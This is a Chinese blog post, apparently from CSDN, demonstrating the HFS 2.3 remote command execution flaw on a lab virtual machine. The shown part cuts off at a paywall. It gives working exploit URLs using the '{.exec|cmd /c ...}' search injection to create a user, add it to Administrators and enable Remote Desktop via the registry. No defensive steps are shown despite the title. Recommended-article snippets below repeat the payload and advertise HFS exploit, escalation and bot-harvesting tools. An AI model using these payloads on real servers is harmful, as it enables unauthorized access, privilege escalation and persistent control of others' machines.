HFS Cmd执行漏洞入侵与防御

最新推荐文章于 2024-06-11 16:48:40 发布
最新推荐文章于 2024-06-11 16:48:40 发布
阅读量5.5k 收藏 4
点赞数
分类专栏: 漏洞攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010005482/article/details/39401885
版权

    最近爆出了HFS(Http File Server)爆出了这个漏洞。我测使用的是HFS 2.3.0.0  


我在搭建的虚拟机上运行了HFS。 把它当做是一台运行了 HFS的服务器。

现在我们查看一下 服务器(虚拟机有多少个账户) net user 指令能很好的查看


好我们利用漏洞 来增加账户!

在浏览器上键入这些地址和指令

http://192.168.1.9/?search==%00{.exec|cmd /c net user Smile Smile /add.} 这样我们就可以执行我们的CMD指令

在虚拟机上用net user查看。



这样账户就添加成功了。这样我们创建的是普通用户  的普通权限。接下来就是提权了

提升为管理员权限:

http://192.168.1.9/?search==%00{.exec|cmd /c net localgroup Administrators smile /add.}

开启3389:

http://192.168.1.9/?search==%00{.exec|cmd /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_D

最低0.47元/天 解锁文章
u010005482
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rejetto HTTP文件服务器 未授权RCE漏洞复现(CVE-2024-23692)
0xSec
06-11 1378
Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
HFS的远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3218
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
HFS修复漏洞
09-20
HFS修复漏洞
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5586
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS 2.3x 远程命令执行漏洞 讲解
weixin_65409651的博客
05-01 297
运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
最新发布
huangyongkang666的博客
06-11 1562
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
HFS远程命令执行漏洞入侵抓鸡黑阔服务器
aiquan9342的博客
12-24 1415
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙...
weixin_30537391的博客
09-07 606
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分:百度搜HFS默认就是2.3...
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6267
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
HFS漏洞利用工具 e语言源码
03-08
HFS漏洞利用工具 e语言源码
HFS批量扫描
06-12
HFS批量扫描
hfs 2.3m Build #300
12-28
在个人电脑上搭建http服务器,让其它朋友直接访问并下载,操作简单方便。
hfs提权 2.3b之前
02-03
简易提权 有弹窗 HFS2.3B以前漏洞提权.exe
红泪HFS提权
06-03
HFS提权工具
hfs网络文件服务器 2.3i Build 299 绿色中文版
09-25
hfs网络文件服务器是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统。windows软件
HFS提权工具,hfs漏洞提权软件
12-10
HFS提权工具,hfs漏洞提权软件
HFS模板_HFS模板_
10-04
HFS(Hierarchical File System,分层文件系统)是一种由RISC OS操作系统使用的文件系统格式。在当前场景中,提到的“HFS模板”可能是针对HFS文件系统的网站或应用程序设计模板,它允许用户以结构化的方式组织和展示...
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1700
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
hfs socket
07-28
您好!对于您提到的 "hfs socket",我不太清楚具体指的是什么。"HFS" 可能是各种不同的含义,包括但不限于以下几种可能: 1. "HFS" 可能指 "Hierarchical File System",是一种在苹果电脑上常见的文件系统。它主要用于组织和管理文件和文件夹。 2. "HFS" 也可能是指 "HTTP File Server",是一种用于在本地计算机上共享文件和文件夹的简单HTTP服务器软件。 3. 如果您指的是 "HFS socket",可能是指在网络编程中使用的套接字(socket)连接,用于在 HTTP File Server 或其他服务器之间进行通信。 如果您能提供更多的上下文或信息,我将能够更准确地回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值